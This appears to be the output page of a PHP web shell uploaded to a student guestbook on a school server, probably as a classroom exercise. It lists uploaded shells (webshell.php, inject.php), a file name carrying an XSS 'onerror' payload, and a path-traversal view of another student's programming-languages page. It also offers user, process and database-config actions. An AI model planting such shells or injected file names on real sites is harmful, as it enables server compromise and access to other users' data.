🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../577320.klas4s23.mid-ica.nl/public_html/technowire/index2.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style1.css">
    <link rel="icon" type="image/x-icon" sizes="32x32" href="123.png">
    <title> Program Languages </title>
</head>
<body>

 

    <div class="container">

        <div class="header">
            <div class="logo">
                <img  class="logo" src="techno.png" alt="">
            </div>
    

        </div>
        <div class="nav-bar">
            <ul>
                <li><a href="techno.html">Home</a></li>
                <li><a href="index1.html">Silicon Valley</a></li>
                <li><a href="index2.html">Program Languages</a></li>
                <li><a href="index3.html">ICT Hall Of Fame</a></li>
        
            </ul>
        


        </div>
        <div class="title">
            <h1> Program Languages </h1>

        </div>


        <div class="content">



            <div class="timeline">
                <div class="containerr left-containerr">
                    <img src="Fortran.png" alt="">
                    <div class="text-box">
                        <h2>Fortran </h2>
                        <small>1957</small>
                        <p>Fortran is the oldest programming language still in use, primarily for 
                            scientific calculations. It initially lacked features like pointers, making 
                            it challenging for system tasks. Fortran 77 improved control structures and
                             character data. Fortran 90 introduced pointers for increased reliability,
                             while Fortran 95 allows custom data types, similar to C programming.</p>
                             <span class="left-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr right-containerr">
                    <img src="cobol.png" alt="">
                    <div class="text-box">
                        <h2>Cobol </h2>
                        <small>1959</small>
                        <p>It was created because it's easier to write and read. The use of COBOL
                             has declined, but the Dutch government still used it in 2018. In the past,
                              COBOL was common on Digital computers like VAX and Alpha. The group behind 
                              COBOL introduced COBOL-61, and its usage increased. COBOL-74 is an improved 
                              version with collaboration with ANSI. In COBOL-2002, it's possible to use a
                              multi-paradigm programming language. Grace Murray Hopper played a significant
                               role in COBOL's development.</p>
                             <span class="right-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr left-containerr">
                    <img src="c.png" alt="">
                    <div class="text-box">
                        <h2> C </h2>
                        <small>1972</small>
                        <p>In 1972, the programming language C was introduced, and it is 
                            still widely used today. It quickly gained popularity worldwide.
                             The designer, Dennis Ritchie, also found success with Unix. Many
                              programming languages, such as C# and C++, have their origins in C.
                               C remains a favorite among programmers and is one of the most prominent
                                programming languages globally. It's suitable for creating games and apps.
                             Dennis Ritchie played a pivotal role in its development.</p>
                             <span class="left-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr right-containerr">
                    <img src="Python.png" alt="">
                    <div class="text-box">
                        <h2> Python</h2>
                        <small> 1991</small>
                        <p>Python is a widely-used programming language, especially for data and 
                            game development. It is primarily used for backend programming. Python 
                            uses duck-typing, allowing you to adapt objects with new methods. Python
                             code is written in text files with specific extensions. To execute Python,
                              you use the "python" command at the beginning of your code. It is known for 
                              its readable syntax, making it pleasant to read and write code. Python is also 
                              commonly used for automating tasks.
                             Guido van Rossum played a significant role in its development.</p>
                             <span class="right-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr left-containerr">
                    <img src="php.png" alt="">
                    <div class="text-box">
                        <h2> PHP </h2>
                        <small>1994</small>
                        <p>PHP, originally known as Personal Home Page Tools, is now called Hypertext
                             Preprocessor or simply PHP. It is a backend programming language primarily
                              used for websites. PHP is used worldwide and is particularly useful for 
                              presenting and storing data, enabling functions like creating a guestbook 
                              for people to leave and view messages. PHP also allows for embedding HTML
                               code on various pages.
                             Rasmus Lerdorf played a key role in its creation.</p>
                             <span class="left-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr right-containerr">
                    <img src="java.png" alt="">
                    <div class="text-box">
                        <h2>Java </h2>
                        <small>1995</small>
                        <p>Java allows you to create software for various platforms,
                             using the "Write once run anywhere" (WORA) approach.
                              It's used for developing services and applications. 
                              The advantage of Java is its platform independence, 
                              as it runs on any operating system. However, it may not be the fastest language. 
                              Sun Microsystems originally owned Java,
                             and it is now owned by Oracle Corporation.</p>
                             <span class="right-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr left-containerr">
                    <img src="Javascript.png" alt="">
                    <div class="text-box">
                        <h2> Javascript </h2>
                        <small>1993</small>
                        <p>JavaScript is often considered one of the most widely used and versatile 
                            programming languages. It can be used for various purposes, including creating
                             web pages, web forms, web applications, and browser games.
                             Brandon Eich was a key figure in the creation of JavaScript.</p>
                             <span class="left-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr right-containerr">
                    <img src="HtmlCSS1.png" alt="">
                    <div class="text-box">
                        <h2>Html CSS </h2>
                        <small>1993</small>
                        <p>HTML and CSS are languages used for creating websites. HTML is 
                            used for structuring web content, 
                            while CSS is used for designing the appearance of web pages.
                             HTML5 is the most recent version of HTML, and CSS3 is the latest
                              version of CSS. Tim Berners-Lee played a significant role in the development 
                              of HTML and is often credited as the inventor of the World Wide Web.</p>
                             <span class="right-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr left-containerr">
                    <img src="cc.png" alt="">
                    <div class="text-box">
                        <h2> C# </h2>
                        <small>2000</small>
                        <p>C# is a backend programming language used for creating mobile apps, 
                            desktop applications, and games. It's often compared to Java but is 
                            considered more capable and powerful.
                             Anders Hejlsberg played a significant role in the development of C#.</p>
                             <span class="left-containerr-arrow"></span>
                    </div>
                </div>
        
        
                <div class="containerr right-containerr">
                    <img src="Bicep.png" alt="">
                    <div class="text-box">
                        <h2>Bicep </h2>
                        <small>2020</small>
                        <p>Bicep is a Microsoft programming language for Azure that is used to 
                            implement Azure resources. It offers the advantage of having a simplified syntax.
                             It was introduced by Microsoft in 2020.</p>
                             <span class="right-containerr-arrow"></span>
                    </div>
                </div>
        
        
        
            </div>
       
    


      </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!